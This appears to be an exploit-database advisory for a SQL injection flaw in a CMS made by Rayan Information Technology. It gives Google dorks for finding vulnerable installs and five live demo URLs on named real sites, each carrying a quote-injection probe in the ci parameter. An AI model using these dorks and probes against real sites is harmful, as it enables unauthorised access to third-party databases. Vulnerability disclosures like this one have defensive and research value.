Rayan Information Technology SQL injection Vulnerability

########################## # Exploit Title: Rayan Information Technology SQL injection Vulnerability # Google Dork : inurl:/view_news.php intext:طراحی و توسعه توسط شرکت فناوری اطلاعات رایان # Google Dork2 : inurl:/uploaded/view_file_group.php # Vendor Homepage : https://rayan.com.co/ ########################## # {DEMO} http://sport-ac.ir/uploaded/view_file_group.php?ci=59%27 http://handballrazavi.ir/uploaded/view_file_group.php?ci=11%27 http://anjomanharazavi.ir/uploaded/view_file_group.php?ci=3%27 http://dartrazavi.ir/uploaded/view_file_group.php?ci=4%27 http://www.tabaran.com/uploaded/view_file_group.php?ci=5%27 ################################### #Thanks to : XMaziar - Behnam_RST - Abolfazl Fatahi - Luffy - AmirHV - C0c01n - CrazyBOy10 # Discovered By: VAHiD ZOOM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top